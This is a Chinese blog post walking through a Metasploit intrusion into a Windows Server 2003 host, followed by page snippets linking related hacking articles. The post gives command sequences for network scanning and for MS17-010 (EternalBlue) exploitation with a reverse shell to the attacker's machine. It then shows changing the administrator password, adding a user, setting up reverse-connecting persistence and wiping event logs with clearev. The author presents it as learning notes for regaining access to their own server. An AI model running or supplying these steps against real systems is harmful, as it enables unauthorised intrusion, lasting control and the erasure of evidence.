MSF-win2003-getshell

于 2023-09-17 14:38:07 发布
阅读量122 收藏
点赞数
文章标签: 系统安全 网络安全 网络攻击模型
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_59826623/article/details/132942653
版权

声明:此篇内容仅作学习记录和技术总结,读者不得使用文中内容进行非法测试,违者自负。

一、前言

许久未用的服务器忘记密码,尝试几次无果后,决定自己打进去看看。

二、信息收集

1.主机发现

查看网卡所在网段为192.168.0.0/24

nmap 192.168.0.0/24
arp-scan 192.168.0.0/24
netdiscover -i eth0 -r 192.168.0.0/24

使用msf中的模块

use>auxiliary/scanner/discovery/arp_sweep			//使用辅助模块
set RHOSTS > 192.168.0.0/24 									//设置扫描的网段
run

Win2003的IP为0.1

2.端口扫描(服务查点)

搜索一下portscan工具

search type:auxiliary path:portscan

使用第6个syn半连接扫描

设置目标地址

set RHOST > 192.168.0.1
run

只扫描出两个TCP的端口

使用Nmap扫描,结果还是很可观的。

nmap -sV -T4 192.168.0.1

目标445端口(SMB文件共享服务)是开放的,尝试使用永恒之蓝(MS17-010)干它一下

3.漏洞扫描

先扫描一下目标主机是否存在此漏洞

msf6 > search ms17-010
use 4 	auxiliary/sacnner/smb/smb_ms17_010
set RHOST 192.168.0.1
run

结果显示漏洞可能(大概率)存在,并且将服务器的系统版本也列了出来

4.漏洞利用

使用第2个exploit,默认的反弹地址为127.0.0.1(loop back),需要改下设置

use 2 exploit/windows/smb/smb_ms17_010
set rhost 192.168.0.1
set lhost 192.169.0.10				//设置shell反弹地址为本机kali
set lport 默认端口为4444,如无占用可不修改
run

成功拿下system32最高权限

查看IP和账号信息,有个管理员账号

修改管理员账号为123.com,创建一个future用户登录查看

成功进入!

5.权限维持

目标主机C:\windows\temp目录下,产生一个.Vbs的脚本,实现开机自动运行。在kali上监听7777端口,等待反弹对话。

run persistence -S -U -X -i 3 -p 7777 -r 192.168.0.1

6.痕迹清除

C:\Windows\system32 > clearev
FuTur3
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
靶机DC-1练习:借助msfconsole进行漏洞查询利用getshell后,采用suid提权
7Riven's blog
12-10 2500
1.靶机IP地址发现 2.查看靶机版本和服务 -sV:用来扫描目标主机和端口上运行的软件的版本 -p-:扫描0-65535全部端口 -sS/sT/sA/sW/sM:指定使用 TCP SYN/Connect()/ACK/Window/Maimon scans的方式来对目标主机进行扫描 -Pn:选项指示NMAP跳过默认的发现检查并对执行对目标的完整端口扫描。当扫描被阻止ping探针的防火...
MSF利用永恒之蓝渗透win2003
懂进攻知防守
06-14 1016
本章通过使用msf在内网环境下利用永恒之蓝漏洞模拟攻击win2003完整的渗透流程。
CVE-2020-0796漏洞复现getshell
臭nana的博客
06-08 4106
漏洞描述 SMB远程代码执行漏洞 SMB 3.1.1协议中处理压缩消息时,对其中数据没有经过安全检查,直接使用会引发内存破坏漏洞,可能被攻击者利用远程执行任意代码。攻击者利用该漏洞无须权限即可实现远程代码执行,受黑客攻击的目标系统只需开机在线即可能被入侵。 漏洞原理 Microsoft服务器消息块(SMB)协议是Microsoft Windows中使用的一项Microsoft网络文件共享协议。在大部分windows系统中都是默认开启的,用于在计算机间共享文件、打印机等。 Windows 10和Wi
内网实验1:getshell、上线提权、抓取主机密码
soldi_er的博客
05-11 2876
文章目录概述实验1:phpmyadmin弱口令+写木马 概述   实验目标:省略外部打点过程,侧重于拿到system权限之后的事宜。   环境情况如下,发现宿主机难以访问Win7服务器,可以用Kali访问。 宿主机:192.168.43.56 Kali攻击机:192.168.43.57 Win7外网服务器:192.168.43.100 实验1:phpmyadmin弱口令+写木马   Kali机访问192.168.43.100/phpMyAdmin,弱口令root/root登录。   phpMyAdmin
【工具使用】——MSF使用_使用MSF抓取用户密码
weixin_45588247的博客
08-08 6747
一、抓取自动登录的密码:   很多用户习惯将计算机设置自动登录,可以使用run windows/gather/credentials/windows_autologin抓取自动登录的用户名和密码。   点击进入:开启windows用户自动登陆的方法! 命令: run windows/gather/credentials/windows_autologin 二、导出密码哈希: 1. run hashdump命令:   hashdump模块可以从SAM数据库中导出本地用户账号,该命令的使用需要系统权限
php-msf源码详解
10-18
主要介绍了php-msf源码的意思以及用法相关问题,有需要的朋友跟着参考学习下吧。
php-msf-demo
04-29
下载项目git clone https://github.com/pinguo/php-msf-demo.git# Step2. 安装docker镜像构建开发环境.进入项目目录sh build.sh# Step3. 参考Step2输出的信息,使用ssh或者exec进入容器, 到达项目根目录, 安装依赖...
rtk_sensor_damagezfw_rtk_ROS_gpsrtkros_msf-ekf_
09-30
"rtk_sensor_damagezfw_rtk_ROS_gpsrtkros_msf-ekf_"这个标题暗示了我们正在讨论一个与RTK相关的ROS(Robot Operating System)驱动程序,它可能涉及到了一些关键组件和技术。 首先,"RTK"是Real-Time Kinematic的...
MSF-FRONTEND
03-19
Create React App入门 该项目是通过引导的。 可用脚本 在项目目录中,可以运行: npm start 在开发模式下运行该应用程序。打开在浏览器中查看它。 如果您进行编辑,则页面将重新加载。您还将在控制台中看到任何棉绒...
php-msf-docs:PHP微服务框架开发手册,即Micro Service Framework For PHP Develop Manual
04-29
PHP-MSF开发手册 PHP微服务框架开发手册,即Micro Service Framework For PHP Develop Manual,PHP微服务框架即,是Camera360社区服务器端团队基于Swoole自主研发的现代化PHP服务框架,简称msf或者php-msf,它的核心...
beef +metasploit关联拿shell教程
Johnathan的博客
03-01 657
参考了网络很多大神文章,简单小结一下,仅供参考 手动关联 beef + msf 1,配置beef的vim /usr/share/beef-xss/config.yaml,修改此文件metasploit配置为 enable:true 2,配置vim /usr/share/beef-xss/...
Metaspliot进行漏洞扫描
weixin_30895603的博客
01-23 1248
Metaspliot进行漏洞扫描 Metasploit框架是Metasploit项目中最著名的创作,是一个软件开发、测试和利用漏洞的平台。它可以用来创建安全测试工具开发的模块,也可利用模块作为一个渗透测试系统。最初是由HD Moore在2003年创建作为一种便携式网络工具包。它是所有的安全研究人员和黑客之间最受欢迎的渗透测试工具之一。除了渗透测试,该工具还能够在网络和Web应用程序中...
tomcat系统登录部署漏洞—msf破解及war包部署getshell
Sea_Sand息禅
04-11 1838
跟着大佬学习的,如有问题,欢迎指教。 tomcat是一个很常见的java web application服务器 此次实验漏洞:很多用户在设置后台管理员账号密码的时候用了系统默认的配置,这使登录容易被破解 0x00:环境部署 1、java环境,以便运行xmapp 2、xmapp下载:https://www.apachefriends.org/index.html 3、运行xmapp的tomc...
使用MSF反向反弹shell
weixin_45588247的博客
07-20 4616
实验准备: 攻击(攻击者)主机: kali 2020.2 虚拟机 nat 192.168.254.132 反向反弹: 【步骤一】:msfconsole启动,结果如【图1】所示: 【命令】 msfconsole 一、msfconsole(这种没有启用数据库,搜索某些东西会很慢) 二、数据...
入侵Windows server 2003 测试
热门推荐
Tham 在思索中前行!
12-04 1万+
1.         勘察主机 首先需要发现收集目标更多的信息,其中包括: l         目标网络上主机的IP地址 l         目标系统上可访问的TCP和UDP端口 l         目标系统上使用的操作系统 使用Nmap对主机进行端口扫描和系统识别,如图所示:   可以看到主机开放了80、135、139、1025、
使用kali下的msfwindows 2003进行测试
Amdy_amdy的博客
07-02 2584
使用kali下的msfwindows 2003进行测试 测试环境: windows 2003 192.168.145.132 kali: 192.168.145.146 使用kali查看windows2003下开放的端口以及对应端口是否存在漏洞: nmap --script=vuln 192.168.145.132 root@kali:~# nmap --script=vuln ...
记一次渗透getshell的过程吧!!!!
qq_38611079的博客
07-20 2376
渗透一个网站通常先做信息收集,但是这次比较特殊,直接拿到的是网站后台的登录页面。先试试运气吧。 发现疑似后台,先进行尝试。进行弱口令尝试。发现意外惊喜,后台竟然任意密码登录,(这也是写这个博客的原因,运气太好了吧。) 登录完成,进入后台。 东逛逛西看看后,想办法上传webshell. 可以执行sql,那么先报错,拿到路径 数据库为access 进行导...
metasploit文件格式漏洞渗透攻击(成功获得shell
天元喜羊羊的博客
05-14 7152
环境BT5R1 msf > use windows/fileformat/ms11_006_createsizeddibsection msf exploit(ms11_006_createsizeddibsection) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_t
利用msfwindows下反弹shell
Jiajiajiang_的博客
08-08 7102
靶机地址:10.0.3.146 攻击者地址:10.0.3.120 思路:生成一个shell,让靶机下载下来并执行。方法一是利用ftp下载,方法二是利用可信证书下载http网站的内容。 通过命令执行可以知道靶机是windows2003,32位的。(命令执行systeminfo) 首先利用kali生成一个shell, 命令:msfvenom -p windows/meterpreter...
MSF getshell
最新发布
09-10
MSF是指Metasploit Framework,它是一款广泛使用的渗透测试工具。MSF有两个版本,分别是开源免费的Metasploit和商业收费的Metasploit Pro,针对一般用户来说,使用免费的社区版就足够了。 使用MSF有以下几个步骤: ...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值